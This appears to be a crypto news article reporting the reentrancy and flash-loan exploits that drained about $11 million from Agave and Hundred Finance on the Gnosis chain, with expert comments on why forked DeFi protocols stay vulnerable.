Agave and Hundred Finance Exploited as Crypto Crimes Skyrocket
DeFi exploits have exploded this week, with several protocols falling into the crosshairs of bad actors. In the latest attack, Agave and Hundred Finance were exploited on the Gnosis chain this past Tuesday, resulting in losses amounting to $11 million worth of crypto.
Breakdown of The Make AwayThe hackers introduced a reentrancy bug on both protocols, allowing them to implement a flash loan exploit. The attackers made off with millions in USD Coin, wrapped ETH, Gnosis (GNO), wrapped BTC, Chainlink (LINK), and wrapped XDAI. The reentrancy vulnerability allowed the malicious actors to wash away funds from the two protocols by tricking the protocol into making repeated external calls to an untrusted contract. The cyber criminals exploited the bug to continually borrow from the protocols without putting additional collateral. They have since sent over 2,100 ETH to a crypto mixer in an attempt to launder the drained funds. Following the security breaches, the Agave token (AGVE) and Hundred Finance token (HND) have plummeted 20% and 3.5%, respectively. Both protocols have paused operations as the developers continue investigating the exploits.
DeFi Reentrancy Attacks Make a ComebackThe recent exploits on Agave and Hundred Finance occurred just 24 hours after hackers stole $3 million worth of crypto from the popular DeFi protocol Deus Finance. Like the twin attacks on Tuesday, the Deus Finance infiltrators ran a reentrancy bug to borrow against the same collateral continually. In the wake of the three attacks on prominent DeFi protocol this week, industry security experts are voicing their concern over the inability of developers to eradicate known vulnerabilities. According to Gleb Zykov, the Co-Founder and CTO of DeFi security and analytics company HashEx, project backers can do more to prevent reentrancy attacks by leveraging statistical analysis tools that pinpoint weak spots in DeFI of codebases. Agave is a fork of DeFi lending platform Aave, while Hundred Finance is a fork of the Compound protocol. Zykov blames a project fork problem in both contracts that allowed for the devastating reentrancy attacks. Blockchain expert Mudit Gupta struck a similar tune, arguing that the underlying reason for the recurring hacks is that the bridged tokens on the Gnosis network are non-standard. In a recent tweet, the DeFi security researcher claimed that while the parent blockchains are keen to follow the recommended checks-effects-interactions pattern in lending procedures, the forked projects don’t.
“The agave and hundred protocol teams messed up by listing a token that can reenter. Aave and compound governance actively check for reentrancy before listing tokens on the mainnet to avoid similar attacks,” Gupta noted.